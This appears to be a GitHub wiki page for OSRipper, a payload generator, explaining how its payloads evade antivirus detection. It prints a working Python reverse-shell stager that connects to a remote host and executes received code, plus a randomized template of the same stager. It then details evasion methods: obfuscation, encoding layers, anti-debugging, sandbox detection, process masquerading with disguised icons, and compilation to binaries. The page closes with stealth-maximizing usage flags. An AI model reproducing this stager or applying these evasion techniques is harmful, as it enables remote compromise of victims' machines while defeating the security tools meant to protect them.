-
Notifications
You must be signed in to change notification settings - Fork 53
Proof Of Concept
This page explains how OSRipper achieves FUD (Fully Undetectable) status and why it works.
OSRipper remains FUD on macOS and other platforms since its release and continues to maintain this status. This document explains the technical approach and methodology.
Standard Python meterpreter payloads are easily detected by antivirus solutions. A typical reverse TCP SSL meterpreter looks like this:
import zlib,base64,ssl,socket,struct,time
for x in range(10):
try:
so=socket.socket(2,1)
so.connect((host,port))
s=ssl.wrap_socket(so)
break
except:
time.sleep(10)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})This code flags on every antivirus scanner because:
- Static signatures match known patterns
- Code structure is recognizable
- Variable names are predictable
- Import statements are standard
OSRipper uses a multi-layered approach to achieve FUD status:
Every payload is unique through:
- Random Variable Names - Each variable name is randomly generated
- Random Code Structure - Code organization varies per generation
- Random Encoding Keys - Encoding parameters are randomized
Code is transformed through multiple layers:
- Variable Name Randomization - All variables renamed
- Code Structure Obfuscation - Code reorganized
- String Encryption - Strings encoded/encrypted
- Base64 Encoding - Multiple encoding layers
Additional techniques for maximum stealth:
- Anti-Debugging - Detects and evades debuggers
- VM Detection - Identifies and exits in sandboxes
- Junk Code Injection - Adds meaningless code
- Process Masquerading - Disguises as legitimate process
The generator creates a base payload template with randomized variables:
# Example randomized payload structure
nonce1 = secrets.randbelow(14)
nonce2 = secrets.randbelow(42371)
socket_var = generate_random_string(8-15)
ssl_var = generate_random_string(8-15)
host_var = generate_random_string(8-15)
port_var = generate_random_string(8-15)
# Randomized code structure
{port_var} = {port}
{host_var} = "{host}"
import zlib,base64,ssl,socket,struct,time
{ssl_var} = None
for x in range(10):
try:
{socket_var}=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
{socket_var}.settimeout(5)
{socket_var}.connect(({host_var},{port_var}))
{context_var} = ssl._create_unverified_context()
{ssl_var}={context_var}.wrap_socket({socket_var})
break
except Exception as e:
time.sleep(2)
# ... rest of payloadThe obfuscator applies multiple transformations:
-
Variable Randomization
- All variables renamed to random strings
- Function names randomized
- Class names randomized
-
Code Encoding
- Base64 encoding layers
- String encryption
- Code compression
-
Structure Obfuscation
- Code reorganized
- Control flow modified
- Dead code insertion
If enhanced mode is enabled:
-
Anti-Debugging Code
# Detects debuggers and exits if sys.gettrace() is not None: sys.exit(1)
-
VM Detection
# Checks for VM indicators if detect_vm(): sys.exit(1)
-
Junk Code
- Meaningless code inserted
- Unused variables
- Dead code paths
If compilation is enabled:
-
Nuitka Compilation
- Python code compiled to binary
- Standalone executable
- No Python interpreter required
-
Icon Injection
- Custom icon added (Windows/macOS)
- Process masquerading
- Unique Payloads - Every payload is different
- No Static Patterns - Code structure varies
- Random Variables - No predictable names
- Stealth Delays - Random startup delays
- Process Masquerading - Looks like legitimate process
- VM Detection - Exits in analysis environments
- Multi-Layer Encoding - Multiple transformation layers
- String Encryption - Strings not visible in plaintext
- Structure Obfuscation - Code flow is obscured
- Python Payload: 0/68 detection rate
- Compiled Binary: 0/68 detection rate
- No Static Signatures - Code is unique each time
- Obfuscated Structure - Code structure is unrecognizable
- Random Variables - No predictable patterns
- Behavioral Analysis - Stealth techniques evade analysis
- Python Dependency - Python payloads require Python interpreter
- Compilation Size - Compiled binaries are larger
- Analysis - Advanced analysis may still detect behavior
- Better Obfuscation - More advanced techniques
- Smaller Binaries - Optimized compilation
- Advanced Evasion - More sophisticated evasion
def generate_random_string(length):
"""Generate random string for obfuscation."""
return "".join(secrets.choice(string.ascii_letters)
for _ in range(length))
# Usage
socket_var = generate_random_string(random.randint(8, 15))- Parse Python AST (Abstract Syntax Tree)
- Randomize variable names
- Encode strings
- Reorganize code structure
- Apply encoding layers
- Output obfuscated code
- Prepare obfuscated source
- Run Nuitka compiler
- Include dependencies
- Create standalone binary
- Inject icon (if provided)
-
Always Use Obfuscation
--obfuscate --enhanced
-
Compile to Binary
--compile
-
Add Stealth Delay
--delay
-
Use Custom Icons
--icon legitimate_app.ico
-
Test in VM First - Use
--testingflag - Verify Functionality - Ensure payload works
- Check Detection - Scan with antivirus
- Deploy Carefully - Only on authorized systems
OSRipper achieves FUD status through:
- Randomization - Every payload is unique
- Obfuscation - Code is heavily transformed
- Evasion - Behavioral techniques avoid detection
- Compilation - Binary format adds another layer
The combination of these techniques ensures that OSRipper payloads remain undetected by modern antivirus solutions.
For more technical details, see Randomising and Obfuscation pages.